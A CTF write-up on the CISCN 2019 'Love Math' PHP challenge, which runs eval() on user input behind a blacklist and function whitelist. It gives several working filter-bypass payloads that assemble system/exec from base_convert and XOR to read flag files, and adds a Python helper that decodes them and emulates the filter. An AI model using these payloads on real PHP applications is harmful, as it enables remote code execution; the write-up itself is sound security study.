Table of Contents
- Reproduction record: [CISCN 2019 Preliminary] Love Math
- Idea one
- Idea two
- Summary
Reproduction record: [CISCN 2019 Preliminary] Love Math
Challenge reproduction link: https://buuoj.cn/challenges
Reference links: 2019CISCN web question contest-JustSoSo;love_math (reproduction)
2019 National College Student Information Security Competition ciscn-writeup(4web)
CISCN2019Web WP
The BUU environment has no flag; I really don't know why, so I can only reproduce it locally.
The source code is as follows:
```php
<?php
error_reporting(0);
// I heard that you like mathematics very much; I wonder whether you love it more than you love the flag
if (!isset($_GET['c'])) {
    show_source(__FILE__);
} else {
    // Example: c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("Too long will not count");
    }
    // Each entry is used as a regex: whitespace, quotes, backticks and square brackets are rejected
    $blacklist = [' ', '\t', '\r', '\n', '\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("Please do not enter odd Strange characters");
        }
    }
    // Commonly used mathematical functions http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs','acos','acosh','asin','asinh','atan2','atan','atanh','base_convert','bindec','ceil','cos','cosh','decbin','dechex','decoct','deg2rad','exp','expm1','floor','fmod','getrandmax','hexdec','hypot','is_finite','is_infinite','is_nan','lcg_value','log10','log1p','log','max','min','mt_getrandmax','mt_rand','mt_srand','octdec','pi','pow','rad2deg','rand','round','sin','sinh','sqrt','srand','tan','tanh'];
    // Every identifier appearing in the input must be one of the whitelisted function names
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("Please do not enter weird functions");
        }
    }
    // Help you work out the answer
    eval('echo ' . $content . ';');
}
```
This is clearly an RCE construction challenge. After working through the filters, what remains usable is: the mathematical functions in the whitelist and operators such as `.` and `^`, with the total length limited to 80 characters.
There are two lines of thinking. First, a few PHP characteristics to be familiar with:
- Dynamic function calls: in PHP a function name can be stored in a variable as a string and the function then called through that variable, for example `$function = "sayHello"; $function();`
- A bare function name in PHP is treated as a string: an unquoted word that is not a defined constant evaluates to its own name (with a notice, in PHP 7), so whitelisted names such as `asinh` and `pi` can be XORed directly, which widens the set of characters that can be constructed.
Idea one
80 characters is quite tight. The first thought is to construct `$_GET[1]` and then pass the real payload through that parameter, but constructing it turns out to be harder than expected: `$_GET` cannot be written directly, because `_GET` is not a whitelisted identifier, `[` and `]` are blacklisted, and `GET` must stay uppercase (base_convert only produces lowercase digits).
One payload looks like this:
$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs}) &pi=system&abs=tac flag.php
Analysis:
base_convert(37907361743,10,36) => "hex2bin"
dechex(1598506324) => "5f474554"
$pi=hex2bin("5f474554") => $pi="_GET" // hex2bin turns a string of hexadecimal digits into the corresponding bytes
($$pi){pi}(($$pi){abs}) => $_GET{pi}($_GET{abs}) // {} can replace [] for offset access
Another payload looks like this:
$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
Analysis:
base_convert(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
exec(getallheaders(){1})
// the two expressions xx and yy are separated by a comma; echo outputs each of them, so the whole input is evaluated as
echo xx,yy
Since `$_GET` cannot be used, the command is passed in a request header instead: getallheaders(){1} takes the header at index 1.
Idea two
It is also possible to cat the flag directly:
// exec(hex2bin(dechex(109270211257898))) => exec('cat f*')
($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))
// system('cat'.(dechex(16)^asinh^pi)) => system('cat *')
base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))
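To check the numbers quoted in both ideas above, here is an added Python helper that is not part of the original writeup. It reimplements the PHP conversions the payloads rely on (base_convert, dechex, hex2bin and the string `^` operator) and emulates the challenge's blacklist/whitelist check, so the decoding table can be verified offline and the defender-side lesson becomes visible: the identifier whitelist only constrains the literal identifiers in the source text, not the function names the program computes at runtime, so token filtering cannot make eval() on user input safe. The function names (php_base_convert, reject_reason, decode_constants) are my own; the constants are the ones quoted in the analysis, and the payload used for the check is copied from Idea one.

```python
import re

# Added example (not the original challenge's code): Python versions of the PHP
# built-ins the writeup's analysis relies on, plus an emulation of the challenge filter.

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def php_base_convert(number, frombase, tobase):
    """Mimic PHP base_convert(): parse `number` (int or str) in `frombase`,
    return it as a lowercase string in `tobase` (2..36)."""
    value = int(str(number), frombase)
    if value == 0:
        return "0"
    out = []
    while value:
        value, rem = divmod(value, tobase)
        out.append(DIGITS[rem])
    return "".join(reversed(out))


def php_dechex(n):
    """Mimic PHP dechex(): lowercase hex digits without a 0x prefix."""
    return format(n, "x")


def php_hex2bin(hexstr):
    """Mimic PHP hex2bin(): hex digits -> raw bytes (decoded as latin-1 here)."""
    return bytes.fromhex(hexstr).decode("latin-1")


def php_str_xor(a, b):
    """PHP's ^ on two strings XORs byte by byte and truncates to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


# The challenge filter, transcribed from the source above (each blacklist entry is a regex).
BLACKLIST = [" ", r"\t", r"\r", r"\n", "'", '"', "`", r"\[", r"\]"]
WHITELIST = {
    'abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert',
    'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp',
    'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite',
    'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax',
    'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin',
    'sinh', 'sqrt', 'srand', 'tan', 'tanh',
}
IDENT_RE = re.compile(r"[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*")


def reject_reason(content):
    """Return the reason the challenge would die() on `content`, or None if it reaches eval()."""
    if len(content) >= 80:
        return "too long"
    for item in BLACKLIST:
        if re.search(item, content, re.M):
            return "blacklisted character"
    for ident in IDENT_RE.findall(content):
        if ident not in WHITELIST:
            return "non-whitelisted identifier: " + ident
    return None


def decode_constants():
    """Map each numeric expression from the analysis to the string PHP would produce."""
    return {
        "base_convert(37907361743,10,36)": php_base_convert(37907361743, 10, 36),
        "hex2bin(dechex(1598506324))": php_hex2bin(php_dechex(1598506324)),
        "base_convert(696468,10,36)": php_base_convert(696468, 10, 36),
        "base_convert(8768397090111664438,10,30)": php_base_convert(8768397090111664438, 10, 30),
        "base_convert(22950,23,34)": php_base_convert(22950, 23, 34),
        "base_convert(76478043844,9,34)": php_base_convert(76478043844, 9, 34),
        "hex2bin(dechex(109270211257898))": php_hex2bin(php_dechex(109270211257898)),
        "base_convert(1751504350,10,36)": php_base_convert(1751504350, 10, 36),
        "base_convert(15941,10,36)": php_base_convert(15941, 10, 36),
        "dechex(16)^asinh^pi": php_str_xor(php_str_xor(php_dechex(16), "asinh"), "pi"),
    }


# Payload copied from Idea one (the value of the c parameter only).
PAGE_PAYLOAD = "$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})"

if __name__ == "__main__":
    for expr, result in decode_constants().items():
        print(f"{expr:45} => {result!r}")
    # What the filter does catch: quotes and non-whitelisted names written literally.
    print(reject_reason("system('id')"))   # blacklisted character
    print(reject_reason("system(id)"))     # non-whitelisted identifier: system
    # What it does not catch: the same name assembled from numbers at runtime.
    print(reject_reason(PAGE_PAYLOAD))     # None
```

The filter emulation follows the PHP source exactly, including the `/m` flag and the identifier regex, so it can be used to test any candidate input against the same rules the challenge applies.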
Summary
This CTF challenge is fun, but unfortunately I'm still too weak at this. I must find the opportunity to learn PHP systematically and do some development myself, so that my understanding is not superficial.